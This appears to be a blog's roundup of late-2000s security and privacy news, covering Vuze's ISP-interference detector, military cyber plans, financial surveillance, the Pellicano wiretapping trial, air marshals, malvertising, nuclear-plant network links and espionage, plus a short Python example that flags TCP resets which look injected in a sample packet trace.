Vuze Inc., a California-based company that provides a popular file-sharing program, is giving its users a tool to help figure out if their Internet service provider is interfering with their traffic.
The Associated Press last year confirmed user reports that Comcast Corp., the country's largest cable company, was secretly disrupting some file-sharing by its subscribers. The company has acknowledged the practice and said it's necessary to curb traffic that would otherwise slow down Internet speeds for other subscribers.
The "plug-in" Vuze made available as a free download last weekend looks for "reset packets," the technique Comcast uses to break off some connections with computers trying to download files from Comcast subscribers, Vuze said Wednesday.
The plug-in works with Vuze's main application, Azureus, which is based on the BitTorrent file-sharing technology. If the user allows it, the plug-in will send data back to Vuze, which will collect information about ISPs that are interfering with their subscribers' traffic.
Palo Alto-based Vuze said Azureus has been downloaded 20 million times, and an average of 1.3 million users are using it at any one time.
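The article says the plug-in "looks for reset packets" but not how it decides a reset is the ISP's rather than the peer's. The following is an added example, not Vuze's code, of a small detector run over a constructed packet log. The two heuristics it uses are assumptions about what an injected TCP RST tends to look like, not the plugin's documented logic: a reset that arrives while data is flowing and before either side sent FIN, and a reset whose IP TTL does not match earlier packets from the same apparent source (a middlebox sits at a different hop count than the real peer). Addresses, TTLs and timestamps are made up for the example.

```python
# Added example, not Vuze's plugin: flag TCP resets that look injected.
from collections import defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class Packet:
    ts: float      # seconds since start of capture
    src: str       # source address
    dst: str       # destination address
    flags: str     # TCP flags, e.g. "S", "SA", "A", "PA", "FA", "R", "RA"
    ttl: int       # IP TTL as seen at the capture point

def conn_key(p: Packet) -> tuple:
    """Connection identity; a real tool would include ports (the 4-tuple)."""
    return tuple(sorted((p.src, p.dst)))

def find_suspicious_resets(packets, ttl_slack: int = 0) -> list:
    """Return (connection, timestamp, reason) for every RST that looks injected.

    Heuristics (assumed, not from the article):
      1. the RST arrives after payload has flowed and before either side sent FIN;
      2. the RST's TTL differs from the TTL of earlier packets claiming the same
         source address (a box in the path forging the peer's address is at a
         different hop distance than the peer itself).
    A RST answering a SYN to a closed port, or one sent after a normal FIN
    close, triggers neither rule.
    """
    by_conn = defaultdict(list)
    for p in sorted(packets, key=lambda p: p.ts):
        by_conn[conn_key(p)].append(p)

    findings = []
    for key, pkts in by_conn.items():
        data_seen = fin_seen = False
        first_ttl = {}               # src address -> TTL of its first non-RST packet
        for p in pkts:
            if "R" in p.flags:
                reasons = []
                if data_seen and not fin_seen:
                    reasons.append("reset while data flowing, no FIN")
                expected = first_ttl.get(p.src)
                if expected is not None and abs(expected - p.ttl) > ttl_slack:
                    reasons.append(f"ttl {p.ttl} != earlier {expected} from {p.src}")
                if reasons:
                    findings.append((key, p.ts, "; ".join(reasons)))
                continue
            if "F" in p.flags:
                fin_seen = True
            if "P" in p.flags:       # PSH set: the segment carries payload
                data_seen = True
            first_ttl.setdefault(p.src, p.ttl)
    return findings

# Constructed trace: one transfer killed by a forged RST, one normal FIN close
# followed by a legitimate RST, and one refused connection (RST in reply to SYN).
SAMPLE_TRACE = [
    Packet(0.00, "10.0.0.5", "203.0.113.7", "S", 64),
    Packet(0.05, "203.0.113.7", "10.0.0.5", "SA", 52),
    Packet(0.05, "10.0.0.5", "203.0.113.7", "A", 64),
    Packet(0.10, "10.0.0.5", "203.0.113.7", "PA", 64),
    Packet(0.20, "203.0.113.7", "10.0.0.5", "PA", 52),
    Packet(0.21, "203.0.113.7", "10.0.0.5", "R", 60),    # injected: mid-stream, wrong TTL
    Packet(1.00, "10.0.0.5", "192.0.2.20", "S", 64),
    Packet(1.05, "192.0.2.20", "10.0.0.5", "SA", 55),
    Packet(1.05, "10.0.0.5", "192.0.2.20", "A", 64),
    Packet(1.10, "10.0.0.5", "192.0.2.20", "PA", 64),
    Packet(1.50, "10.0.0.5", "192.0.2.20", "FA", 64),
    Packet(1.55, "192.0.2.20", "10.0.0.5", "RA", 55),    # abortive but legitimate close after FIN
    Packet(2.00, "10.0.0.5", "198.51.100.9", "S", 64),
    Packet(2.05, "198.51.100.9", "10.0.0.5", "RA", 50),  # closed port: normal RST to a SYN
]

if __name__ == "__main__":
    for key, ts, why in find_suspicious_resets(SAMPLE_TRACE):
        print(f"{ts:6.2f}s {key[0]} <-> {key[1]}: {why}")
```

Neither rule is proof on its own: a crashed peer also resets mid-stream, and TTLs can legitimately change when routes flap, which is why the second rule takes a slack parameter. Counting how often both fire per ISP, as the article says the plug-in reports back to Vuze, is what separates noise from a policy.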
With U.S. civil and military officials increasingly concerned about cyber attacks against American networks, the U.S. Air Force is planning to establish what will probably be the largest and most comprehensive military organization to defend against cyber attack.
And, unlike the apparent efforts of the other U.S. military services in this field, the Air Force will conduct offensive cyber warfare.
Bob Barr: Every Bank Transaction Triggers Snooping
Bob Barr writes in The Atlanta Journal-Constitution:
I am not an Eliot Spitzer fan. The now-former New York governor and I have disagreed privately and publicly on any number of issues, mostly involving questions of prosecutorial abuse. Still, I have great concern with the manner in which his fall from grace was orchestrated, and with the federal laws and regulations on which it was based. The sad saga of Spitzer should concern every American, or at least all those who maintain accounts at any financial institution or who engage in any form of electronic financial transactions.
The web of snooping in which federal investigators and regulators are now able to ensnare any person who engages in any form of financial transaction has become so complex and pervasive that almost no person anywhere in the world can escape its clutches. The ability of the government to manipulate this vast power is magnified manyfold by virtue of the manner in which our laws and regulations require the active complicity of the entire cadre of persons working in, or in some manner connected with, banks and other entities that provide or facilitate financial transactions.
Well, I know what isn't, and the major American outlets for "news" are not really news. It's drivel.
Here's a snapshot.
The BBC, which I consider to actually be a "real news" site:
MSNBC, which I consider to be "Faux News" -- they don't really seem to care about covering real, hard-hitting issues (nor do any of the other main U.S. news outlets):
Let's see... Okay, here's CNN.com:
Here's CBS News:
And ABC News is so polluted with third-party content, dangerous security holes, etc., that I won't even include it here -- but it is relatively the same content, devoid of real news.
You are being actively poisoned.
Let's examine the pressing front-page stories for each of these web news portals:
BBC News: Unrest spreads around Shia Iraq
MSNBC News: Is affirmative action passé?
CNN News: Arkansas flood damage at $2 million and rising
CBS News: Cops Piece Together Iowa Family Slayings
ABC News: McCain Addresses Housing Crisis Options
Now, I don't mean to lessen the importance of slayings in Iowa, nor flooding in Arkansas -- both of which are quite serious -- but this snapshot of news shows that American news outlets cater to issues that somehow shield more serious, critical global issues from the American readership.
The problems in Iraq are absolutely more critical than the American people know, and if we don't collectively wise-up, we're going to be in for a rude awakening.
America: Wake up.
p.s. PBS is the only organization in the U.S. that has any guts to report the truth to the American people.
Pellicano Trial: Spurned Lovers, Prostitutes, and Cyber Geeks
Allison Hope Weiner writes on The Huffington Post:
Robert Pfeiffer, a former music executive, testified today that he hired Mr. Pellicano to destroy the life of his ex-girlfriend, Erin Finn. Mr. Pfeiffer told the jury that after he brought a lawsuit against a former employer for wrongful termination, his ex-girlfriend testified against him and on behalf of his ex-employer, saying he'd used drugs while employed.
Telling the jury that he became irrational and obsessive about Ms. Finn and her "betrayal," Mr. Pfeiffer said that he hired Mr. Pellicano to not only get Ms. Finn to recant her testimony about his drug use but to also "discredit her."
Mr. Pfeiffer claimed that Mr. Pellicano not only convinced him to hire a new lawyer, Alan Weil (who is also coincidentally on the government's witness list), but also got him to file several lawsuits against Ms. Finn, to harass her and to agree to wiretapping her phones. Although Mr. Pfeiffer said that Mr. Pellicano initially referred to his wiretapping of Ms. Finn's phone by code (as in "I've just read something"), Mr. Pellicano ultimately told him directly about the wiretapping and eventually invited him back to his office for a listen.
CNN: U.S. Air Marshals On Only 1% of U.S. Flights
Drew Griffin, Kathleen Johnston and Todd Schwarzschild write on CNN.com:
Of the 28,000 commercial airline flights that take to the skies on an average day in the United States, fewer than 1 percent are protected by on-board, armed federal air marshals, a nationwide CNN investigation has found.
That means a terrorist or other criminal bent on taking over an aircraft would be confronted by a trained air marshal on as few as 280 daily flights, according to more than a dozen federal air marshals and pilots interviewed by CNN.
The Transportation Security Administration flatly denied those reports.
But marshals across the country -- all of whom spoke with CNN on the condition they not be identified for fear of losing their jobs -- said the 5 percent figure quoted to them by their TSA bosses is not possible.
One marshal said that while security is certainly one reason the numbers are kept secret, he believes the agency simply doesn't want taxpayers to know the truth.
"I would be very embarrassed by [the numbers] if they were to get out," one air marshal said.
In recent months we have seen occasions where Advertisements placed with Google have actually pointed consumers to sites which would attempt to infect their computers with various forms of malware. A new Phishing Campaign discovered in the UAB [University of Alabama at Birmingham] Spam Data Mine may indicate this form of attack is about to get a lot worse.
Google has been very quick to identify and terminate the accounts of these malware advertisers, but what will their response be when long-time "known good" advertisers suddenly start having malware pop up in their ads?
This seems to be the focus of a new phishing campaign.
SCADA Watch: Nuclear Plant Cyber Security Has A Ways To Go
Joe Weiss writes on the GlobalControl.com "Unfettered" Blog:
The prevailing wisdom is that nuclear plants are isolated and not connected or interconnected. At least for some nuclear plants, that is simply not true! I personally know of many nuclear plants with remote connectivity to and from their nuclear plant networks.
One interesting case was mentioned at the Applied Control Solutions Conference in Knoxville last August by a representative from a nuclear utility. He mentioned they installed firewalls between their nuclear plant networks and Corporate network because their nuclear plant networks were infecting the Corporate network with malware, not the other way around.
Chi Mak, who worked for a US company with several Navy contracts, was convicted last May of trying to export intelligence about silent submarines in a plot that involved four members of his family.
Mak, whose age was given as 65 by justice officials, was also fined 50,000 dollars by US District Judge Cormac Carney, who said the lengthy sentence was intended to send a message to China’s intelligence services…
He was found guilty of two counts of attempting to send sensitive material to China, acting as a foreign agent without notifying the US government and making false statements to federal agents.
Banks slugged householders more than $1.6 billion in penalties for failed direct debits, exceeding card limits and late payments on credit cards last year, consumer magazine Choice says, but they have been slow to adopt new technology to prevent errors.
Banking systems and practices will come under scrutiny in a Senate inquiry on the Fair Bank and Credit Card Fees Amendment Bill, introduced by Family First Senator Steve Fielding last year.
"Outrageous bank fees need to be reined in," he said. "Banks have been encouraging people to use electronic transactions, but instead of fees coming down they've gone up."
"The issue is doing away with fees that are totally unfair, and getting the rest back to reasonable cost recovery."
Mike Aston, chief executive of real-time payments processing developer Distra, said most banks and credit card firms were still using systems that were 25 to 30 years old, and written in the obsolete Cobol language.